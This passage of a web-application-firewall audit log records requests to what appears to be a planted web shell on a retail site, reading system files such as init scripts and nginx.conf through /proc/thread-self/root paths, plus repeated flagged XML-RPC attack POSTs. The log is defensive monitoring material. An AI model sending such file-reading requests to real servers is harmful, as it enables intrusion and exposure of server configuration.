"sarainternational.cstechns.com"] [uri "/xmlrpc.php"] [unique_id "aFCzOVCTF37l_jAzt4oYngAAAAU"] Apache-Handler: proxy:unix:/var/www/vhosts/system/sarainternational.cstechns.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750119225499918 1025209 (- - -) Stopwatch2: 1750119225499918 1025209; combined=3173, p1=421, p2=2291, p3=101, p4=36, p5=203, sr=106, sw=121, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --1c45de1a-Z-- --311ba06c-A-- [17/Jun/2025:05:44:36.945630 +0530] aFCzbAJ4p5Cdblnjra594wAAAAI 216.73.216.240 58816 127.0.0.1 7081 --311ba06c-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fproc%2Fthread-self%2Froot%2Fetc%2Finit.d&viewfile=%2F%2Fproc%2Fthread-self%2Froot%2Fetc%2Finit.d%2Fxinetd HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.240 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --311ba06c-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3956 Connection: close Content-Type: text/html; charset=UTF-8 --311ba06c-H-- Message: Warning. Matched phrase "etc/init.d" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:path: /proc/thread-self/root/etc/init.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Message: Warning. Matched phrase "etc/init.d" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:viewfile: /proc/thread-self/root/etc/init.d/xinetd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/init.d" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:path: /proc/thread-self/root/etc/init.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFCzbAJ4p5Cdblnjra594wAAAAI"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/init.d" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:viewfile: /proc/thread-self/root/etc/init.d/xinetd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFCzbAJ4p5Cdblnjra594wAAAAI"] Apache-Handler: application/x-httpd-php Stopwatch: 1750119276939861 5846 (- - -) Stopwatch2: 1750119276939861 5846; combined=3386, p1=558, p2=2619, p3=53, p4=39, p5=116, sr=148, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --311ba06c-Z-- --9483862c-A-- [17/Jun/2025:05:44:40.856212 +0530] aFCzcFJfblPUQiSn5r2XcQAAAAA 216.73.216.240 44938 127.0.0.1 7081 --9483862c-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fproc%2Fthread-self%2Froot%2Fetc%2Fnginx&viewfile=%2F%2Fproc%2Fthread-self%2Froot%2Fetc%2Fnginx%2Fnginx.conf HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.240 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --9483862c-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3443 Connection: close Content-Type: text/html; charset=UTF-8 --9483862c-H-- Message: Warning. Matched phrase "etc/nginx/nginx.conf" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/nginx/nginx.conf found within ARGS:viewfile: /proc/thread-self/root/etc/nginx/nginx.conf"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/nginx/nginx.conf" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/nginx/nginx.conf found within ARGS:viewfile: /proc/thread-self/root/etc/nginx/nginx.conf"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFCzcFJfblPUQiSn5r2XcQAAAAA"] Apache-Handler: application/x-httpd-php Stopwatch: 1750119280851942 4326 (- - -) Stopwatch2: 1750119280851942 4326; combined=2349, p1=386, p2=1826, p3=36, p4=37, p5=64, sr=95, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --9483862c-Z-- --21e6542f-A-- [17/Jun/2025:05:44:41.942108 +0530] aFCzcWj9J38fG6WAr4pd2AAAAAk 216.73.216.240 45104 127.0.0.1 7081 --21e6542f-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fproc%2Fthread-self%2Froot%2Fetc%2Finit.d&viewfile=%2F%2Fproc%2Fthread-self%2Froot%2Fetc%2Finit.d%2Fapport HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.240 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --21e6542f-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 4190 Connection: close Content-Type: text/html; charset=UTF-8 --21e6542f-H-- Message: Warning. Matched phrase "etc/init.d" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:path: /proc/thread-self/root/etc/init.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Message: Warning. Matched phrase "etc/init.d" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:viewfile: /proc/thread-self/root/etc/init.d/apport"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/init.d" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:path: /proc/thread-self/root/etc/init.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFCzcWj9J38fG6WAr4pd2AAAAAk"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/init.d" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:viewfile: /proc/thread-self/root/etc/init.d/apport"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFCzcWj9J38fG6WAr4pd2AAAAAk"] Apache-Handler: application/x-httpd-php Stopwatch: 1750119281853092 89088 (- - -) Stopwatch2: 1750119281853092 89088; combined=171136, p1=377, p2=2001, p3=41, p4=37, p5=84406, sr=100, sw=0, l=0, gc=84274 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --21e6542f-Z-- --84b77068-A-- [17/Jun/2025:05:44:46.208144 +0530] aFCzdX4j6VFpohzeqUMR1gAAAAo 146.190.105.35 45544 127.0.0.1 7081 --84b77068-B-- POST //xmlrpc.php HTTP/1.0 Host: sarainternational.cstechns.com X-Real-IP: 146.190.105.35 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 492 Cookie: PHPSESSID=jqiaquqtfurh4ecar8v78gfamh; wp_woocommerce_session_0c7b6c468f739cb08bf10f9411cfebbb=t_d551e20df43f7302916b9d55afa90f%7C%7C1750292084%7C%7C1750288484%7C%7C14a2f951758bc11e122947b09083fcb7; yith_ywraq_session_0c7b6c468f739cb08bf10f9411cfebbb=b8d2222658bb0c4d397fbc2d113b7c2b%7C%7C1750292084%7C%7C1750288484%7C%7C562f3ac4ca782a3b4bbbcc2782bb41fb User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 Content-Type: application/xml --84b77068-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Connection: close Set-Cookie: PHPSESSID=ackcefu5dklm6eeddeq3fmgula; path=/ Set-Cookie: wp_woocommerce_session_0c7b6c468f739cb08bf10f9411cfebbb=t_d78a9a330efd6e1561d38c7b09e2b5%7C%7C1750292085%7C%7C1750288485%7C%7C5ed409e55caf270783f3ccd86628bb41; expires=Thu, 19 Jun 2025 00:14:45 GMT; Max-Age=172799; path=/; secure; HttpOnly Set-Cookie: yith_ywraq_session_0c7b6c468f739cb08bf10f9411cfebbb=b9996a1b32d9ff7b0ff777e8cc68c4fd%7C%7C1750292086%7C%7C1750288486%7C%7C0b81a8629e8c40dfa57127ac5bd2e5c3; expires=Thu, 19 Jun 2025 00:14:46 GMT; Max-Age=172800; path=/ Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --84b77068-E-- --84b77068-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 146.190.105.35 (44+1 hits since last alert)|sarainternational.cstechns.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 146.190.105.35 (44+1 hits since last alert)|sarainternational.cstechns.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "sarainternational.cstechns.com"] [uri "/xmlrpc.php"] [unique_id "aFCzdX4j6VFpohzeqUMR1gAAAAo"] Apache-Handler: proxy:unix:/var/www/vhosts/system/sarainternational.cstechns.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750119285160892 1047340 (- - -) Stopwatch2: 1750119285160892 1047340; combined=3252, p1=430, p2=2429, p3=105, p4=36, p5=158, sr=103, sw=94, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --84b77068-Z-- --9a4a6b46-A-- [17/Jun/2025:05:45:39.443956 +0530] aFCzqwJ4p5Cdblnjra5-EAAAAAI 216.73.216.240 53190 127.0.0.1 7081 --9a4a6b46-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fproc%2Fthread-self%2Froot%2Fetc%2Finit.d&viewfile=%2F%2Fproc%2Fthread-self%2Froot%2Fetc%2Finit.d%2Fuuidd HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.240 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --9a4a6b46-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3602 Connection: close Content-Type: text/html; charset=UTF-8 --9a4a6b46-H-- Message: Warning. Matched phrase "etc/init.d" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:path: /proc/thread-self/root/etc/init.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Message: Warning. Matched phrase "etc/init.d" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:viewfile: /proc/thread-self/root/etc/init.d/uuidd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/init.d" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:path: /proc/thread-self/root/etc/init.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFCzqwJ4p5Cdblnjra5-EAAAAAI"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/init.d" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:viewfile: /proc/thread-self/root/etc/init.d/uuidd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFCzqwJ4p5Cdblnjra5-EAAAAAI"] Apache-Handler: application/x-httpd-php Stopwatch: 1750119339440014 3995 (- - -) Stopwatch2: 1750119339440014 3995; combined=2143, p1=370, p2=1623, p3=39, p4=29, p5=82, sr=94, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --9a4a6b46-Z-- --9a748922-A-- [17/Jun/2025:05:45:42.356099 +0530] aFCzrgJ4p5Cdblnjra5-FAAAAAI 216.73.216.240 53558 127.0.0.1 7081 --9a748922-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fproc%2Fthread-self%2Froot%2Fetc%2Finit.d&viewfile=%2F%2Fproc%2Fthread-self%2Froot%2Fetc%2Finit.d%2Fprocps HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.240 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --9a748922-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3558 Connection: close Content-Type: text/html; charset=UTF-8 --9a748922-H-- Message: Warning. Matched phrase "etc/init.d" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:path: /proc/thread-self/root/etc/init.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Message: Warning. Matched phrase "etc/init.d" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:viewfile: /proc/thread-self/root/etc/init.d/procps"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/init.d" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:path: /proc/thread-self/root/etc/init.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFCzrgJ4p5Cdblnjra5-FAAAAAI"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/init.d" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:viewfile: /proc/thread-self/root/etc/init.d/procps"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFCzrgJ4p5Cdblnjra5-FAAAAAI"] Apache-Handler: application/x-httpd-php Stopwatch: 1750119342352086 4066 (- - -) Stopwatch2: 1750119342352086 4066; combined=2239, p1=481, p2=1606, p3=38, p4=31, p5=83, sr=140, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --9a748922-Z-- --4b206837-A-- [17/Jun/2025:05:45:44.266793 +0530] aFCzsNyZ4SMykfn97vy9kAAAAAs 216.73.216.240 53816 127.0.0.1 7081 --4b206837-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fproc%2Fthread-self%2Froot%2Fetc%2Finit.d&viewfile=%2F%2Fproc%2Fthread-self%2Froot%2Fetc%2Finit.d%2Fiscsid HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.240 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --4b206837-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3769 Connection: close Content-Type: text/html; charset=UTF-8 --4b206837-H-- Message: Warning. Matched phrase "etc/init.d" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:path: /proc/thread-self/root/etc/init.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Message: Warning. Matched phrase "etc/init.d" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:viewfile: /proc/thread-self/root/etc/init.d/iscsid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/init.d" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:path: /proc/thread-self/root/etc/init.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFCzsNyZ4SMykfn97vy9kAAAAAs"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/init.d" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:viewfile: /proc/thread-self/root/etc/init.d/iscsid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFCzsNyZ4SMykfn97vy9kAAAAAs"] Apache-Handler: application/x-httpd-php Stopwatch: 1750119344263455 3414 (- - -) Stopwatch2: 1750119344263455 3414; combined=1811, p1=298, p2=1344, p3=36, p4=29, p5=103, sr=78, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --4b206837-Z-- --dfde6571-A-- [17/Jun/2025:05:45:46.791613 +0530] aFCzsWj9J38fG6WAr4peDQAAAAk 146.190.105.35 53986 127.0.0.1 7081 --dfde6571-B-- POST //xmlrpc.php HTTP/1.0 Host: sarainternational.cstechns.com X-Real-IP: 146.190.105.35 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 490 Cookie: PHPSESSID=j3m3q53hivedfos86sd4f4nujl; wp_woocommerce_session_0c7b6c468f739cb08bf10f9411cfebbb=t_c0addc44ada1171629f2b3f1809f16%7C%7C1750292145%7C%7C1750288545%7C%7C218011d87fba49b521f432da2056b85c; yith_ywraq_session_0c7b6c468f739cb08bf10f9411cfebbb=d64814113042711dc20cc68179787abd%7C%7C1750292145%7C%7C1750288545%7C%7Cc362b38f7aab74794703d7ca8d0e5e98 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 Content-Type: application/xml --dfde6571-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Connection: close Set-Cookie: PHPSESSID=u4i7peoif55cobfdqn0drknq98; path=/ Set-Cookie: wp_woocommerce_session_0c7b6c468f739cb08bf10f9411cfebbb=t_206135f944bbd89b6872e1c3ebe26f%7C%7C1750292146%7C%7C1750288546%7C%7Cd99de5f8eb206831a98444285eb679ce; expires=Thu, 19 Jun 2025 00:15:46 GMT; Max-Age=172800; path=/; secure; HttpOnly Set-Cookie: yith_ywraq_session_0c7b6c468f739cb08bf10f9411cfebbb=0c036edf6f9225362f163bd16e6ad6a7%7C%7C1750292146%7C%7C1750288546%7C%7C057a63ee131f766b2955594e873a1cd9; expires=Thu, 19 Jun 2025 00:15:46 GMT; Max-Age=172800; path=/ Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --dfde6571-E-- --dfde6571-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 146.190.105.35 (45+1 hits since last alert)|sarainternational.cstechns.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 146.190.105.35 (45+1 hits since last alert)|sarainternational.cstechns.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "sarainternational.cstechns.com"] [uri "/xmlrpc.php"] [unique_id "aFCzsWj9J38fG6WAr4peDQAAAAk"] Apache-Handler: proxy:unix:/var/www/vhosts/system/sarainternational.cstechns.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750119345698336 1093384 (- - -) Stopwatch2: 1750119345698336 1093384; combined=3442, p1=435, p2=2483, p3=136, p4=53, p5=210, sr=102, sw=125, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --dfde6571-Z-- --c0aed10b-A-- [17/Jun/2025:05:45:46.818268 +0530] aFCzslJfblPUQiSn5r2XqQAAAAA 216.73.216.240 54144 127.0.0.1 7081 --c0aed10b-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fproc%2Fthread-self%2Froot%2Fetc%2Finit.d&viewfile=%2F%2Fproc%2Fthread-self%2Froot%2Fetc%2Finit.d%2Fapparmor HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.240 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --c0aed10b-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 4618 Connection: close Content-Type: text/html; charset=UTF-8 --c0aed10b-H-- Message: Warning. Matched phrase "etc/init.d" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:path: /proc/thread-self/root/etc/init.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Message: Warning. Matched phrase "etc/init.d" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:viewfile: /proc/thread-self/root/etc/init.d/apparmor"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/init.d" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:path: /proc/thread-self/root/etc/init.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFCzslJfblPUQiSn5r2XqQAAAAA"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/init.d" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:viewfile: /proc/thread-self/root/etc/init.d/apparmor"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri 